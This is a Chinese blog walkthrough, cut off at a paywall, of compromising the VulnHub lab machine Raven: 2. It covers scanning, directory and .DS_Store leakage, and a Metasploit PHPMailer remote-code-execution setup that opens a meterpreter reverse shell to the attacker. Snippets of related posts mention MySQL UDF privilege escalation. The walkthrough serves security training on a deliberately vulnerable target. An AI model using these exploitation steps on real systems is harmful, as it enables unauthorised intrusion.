vulnhub靶机——RAVEN: 2

最新推荐文章于 2025-10-30 17:37:09 发布
原创 最新推荐文章于 2025-10-30 17:37:09 发布 · 2.8k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #linux

本文详细介绍了如何在RAVEN靶机上通过Web扫描、PHPMailer漏洞利用、DS_Store信息泄露和UDF提权获取root权限的过程,包括安装靶机、Web部分的漏洞探测、MySQL提权步骤及番外篇的UDF提权技巧。

文章目录

前言

      难度:中等,目标是需获取四个flag,下载ova文件,本文使用VirtualBox打开,下载地址:https://www.vulnhub.com/entry/raven-2,269/。本文涉及知识点有:靶机环境搭建,dirsearch工具使用,DS_Store信息泄露漏洞,wpscan使用,利用PHPMailer命令执行漏洞获取shell,UDF提权。。
      靶机地址:192.168.56.107
      kali地址:192.168.56.108

一、安装靶机

     1)选择管理—导入虚拟机电脑。
在这里插入图片描述
     2)选择RAVEN: 2下载的文件路径。
在这里插入图片描述
     3)选择导入安装到一个空白的文件夹。
在这里插入图片描述
     4)选择主机网络管理器。
在这里插入图片描述
     5)选择手动配置网卡。
在这里插入图片描述
     6)选择启用并配置DHCP服务器。
在这里插入图片描述
     7)靶机和kali的网卡1都设置成仅主机模式。
在这里插入图片描述
     8)kali的网卡2设置成NAT模式,因为有的时候会有联网的需求。
在这里插入图片描述

二、Web部分

     1)使用nmap扫描网段获取目标ip地址,发现192.168.56.107,确定为靶机地址。注释:192.168.56.100是本机设置的DHCP服务器的ip。

	# -sn 只做ping扫描,不做端口扫描
	# -PE 使用icmp协议请求包发现主机
	# -n 不进行反向DNS解析
	nmap -sn -PE -n 192.168.56.0/24

在这里插入图片描述
     2)使用nmap扫描端口,结果如下:

	nmap -A -T4 -p- 192.168.56.107

在这里插入图片描述
     3)先访问80端口使用dirsearch做目录扫描,然后四处点击看看,点击到BLOG时跳转到了WordPress界面,记一下。
在这里插入图片描述
在这里插入图片描述
     4)目录扫描结果如下所示。发现很多目录,逐个查看下。
在这里插入图片描述
     5)在http://192.168.56.107/vendor/目录下发现存在目录遍历漏洞,文件点点点,在PATH文件中发现了第一个flag。
在这里插入图片描述
在这里插入图片描述
     6)又在readme文件中发现了PHPMailer字眼,从VERSION文件中可知版本为5.2.16,经搜索后发现PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。并且存在远程命令执行漏洞,在记一下,一会测试下是否存在历史漏洞。
在这里插入图片描述
在这里插入图片描述
     7)还发现了.DS_Store信息泄露,但是没有什么有效信息。利用工具地址:https://github.com/lijiejie/ds_store_exp。
在这里插入图片描述
     8)http://192.168.56.107/wordpress/wp-login.php,发现WordPress登录界面,发现提示找不到网站。
在这里插入图片描述
在这里插入图片描述
     9)使用wpscan漏扫工具检测一下是否存在WordPress的历史漏洞。wpscan为kali内置的工具,需注意wpscan需联网才能使用。可以发现找到不少信息,但是没有什么能获取权限的。
在这里插入图片描述
     10)再看看之前收集到的PHPMailer信息,网络搜索看看PHPMailer是否存在历史漏洞,发现存在,使用MSF搜索一下,有两个我们在按照提示使用info 0 和info 1 分别查看下描述情况。发现第一个就适合,我们之前发现此时的版本为5.2.16正好小于5.2.18

search phpmailer
info 0
use 0

在这里插入图片描述
在这里插入图片描述
     11)利用一下,看下需要设置什么。
在这里插入图片描述
     12)对比百度的教程,按照需求配置参数,先配置靶机的ip和邮箱功能页面和绝对路径,在查看设置可以发现kali反弹shell的ip是10的网段,因为是双网卡,所以我们把反弹shell的ip设置成192.168.56.107这个。之后在就配置完成了,端口都默认就好了。

	options
	set RHOSTS 192.168.56.107	  #靶机地址
	set TARGETURI /contact.php    #邮件功能页面
	set WEB_ROOT /var/www/html    #网站绝对路径
	set payload php/meterpreter/reverse_tcp	  #设置payload
	set LHOST 192.168.56.108     #kali地址
	run

最低0.47元/天 解锁文章
【OSCP-vulnhubRaven-2
2301_79949226的博客
04-23 967
本文主要阐释了vulnhub靶机raven-2的复现过程,希望对你有所帮助咯。。
vulnhub靶场,Raven2
kukudeshuo的博客
07-19 2486
vulnhub靶场,Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
Vulhub漏洞靶场搭建(非常详细),零基础入门到精通,看这一篇就够了
最新发布
A1_3_9_7的博客
10-30 1022
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式。
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2965
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
vulnhub-Raven2
LuckySec
12-03 1327
0x01 靶场简介 Raven 2是中级boot2root VM, 有4个flag需要搜集,在多次被攻破后,Raven Security 采取了额外的措施来加固其Web服务器,以防止黑客入侵。您是否仍然可以攻破Raven? 靶场下载:https://download.vulnhub.com/raven/Raven2.ova 0x02 靶场渗透 1. flag1 使用Nmap探测靶机IP地址 nmap -sP 192.168.126.0/24 确定IP地址后,扫描开放的端口和服务 Nmap -p 1-65
vulnhubRaven2
鲨鱼辣椒的博客
08-05 481
信息搜集 扫描网段发现存活主机 扫描IP地址发现开放端口以及服务 浏览器查看网站
3-VulnHub-Raven 2
尼德霍格007
07-08 453
VulnHub-Raven: 2 靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 目标:找到四个flag.txt信息 作者:尼德霍格007 时间:2021-7-8 准备工作:kali虚拟机(NAT),raven2虚拟机(NAT) 一、信息收集 首先要确定目标机IP地址,nmap扫描 $ nmap -sP 192.168.21.0/24 之后查看开放端口,全端口扫描 可以看到目标机开放了22端口(SSH),80端口(HTTP)和两个其他端口(我不知道是干嘛
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 1082
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
Vulnhub靶机——EMPIRE: LUPINONE(PiP命令提权)
流水不争先,争的是滔滔不绝
04-09 1325
Vulnhub靶机——EMPIRE: LUPINONE——PiP命令提权(sudo)
Vulnhub 靶机: ICA: 1
weixin_69670995的博客
05-13 1272
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
Vulnhub靶机——EMPIRE: BREAKOUT
流水不争先,争的是滔滔不绝
04-08 1208
Vulnhub靶机——EMPIRE: BREAKOUT,tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限,利用tar文件的打包压缩再解压,实现文件的权限绕过
Vulnhub系列靶机-Raven2
来日可期的博客
10-14 1024
MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。MYSQL低于5.5的漏洞可以使用UDF提权,查看mysql的运行权限。发现是mysqld是root权限,查看secure_file_priv的设置发现为空,满足udf提权。通过以上信息可知满足udf提权,直接利用1518进行提权,先搜索1518.c,然后查看其所在位置,并复制到桌面。Web页面中也有发送邮件的位置,这样就对应上了。
【渗透测试】VulnHub-Raven: 2
m0_52923241的博客
11-02 3365
VulnHub-Raven: 2VulnHub-Raven: 2渗透详细思路小知识点常用工具篇 VulnHub-Raven: 2渗透详细思路 VulnHub-Raven: 2渗透详细思路 nmap找目标ip地址,扫可以试用的开放端口和服务(22、80、111) dirb进行目录的爆破扫描 找漏洞,发现PHPMailer 邮件服务 searchsploit查看漏洞利用点,下载到本地,修改参数并运行 小知识点 常用工具篇 ...
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 1049
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
vulnhubraven2
weixin_54431413的博客
07-01 875
phpmailer漏洞利用,需要根据实时情况修改exp,udf提权: 拷贝kali自带的链接库文件,创建表,将链接库文件写入到表中,造成表里dump到对应路径中,之后创造自定义函数,利用自定义函数执行操作系统命令,这个mysql属主是root,成功提权。...
vulhub:Raven2
qq_38618396的博客
09-26 901
基本信息 靶机 靶机地址: Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet) 靶机难度:中等 靶机描述
[Vulnhub] Raven-2 (mysql-UDF提权)
weixin_63231007的博客
07-16 834
再次mysql-uroot-pR@v3nSecurity登入mysql,首先我们应该创建一个表,如何再创建一个任务,创建任务之后再调用这个.so,最终再调用.so其中的一个命令这个命令会生成一个可执行的文件输入一句话输入反弹shell命令,最终我们执行完这个命令后就获得root权限。有四个flag要捕获。1vxyz表里成功插入二进制数据,然后利用dumpfile函数把文件导出,outfile多行导出,dumpfile一行导出,outfile会有特殊的转换,而dunpfile是原数据导出!...
Raven2--靶机实操详解
qq_61802750的博客
10-14 1455
​ 进入wordpress目录,有对应的配置文件wp-config.php,我们打开可以看到数据库密码。这时,服务名、版本号都有了,我们可以进行漏洞利用了。​ 既然我们找到mysql版本,我们就可以考虑使用mysql UDF 提权。​ 访问之后,会在后台生成shell文件,我们访问shell.php文件。​ 可以看到,靶机开放了22、80、111端口,我们优先访问80端口。​ 我们再次用python搭建简单的服务器,把文件下载到靶机里面。​ 找到靶机的ip之后,我们使用nmap扫描靶机的端口。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值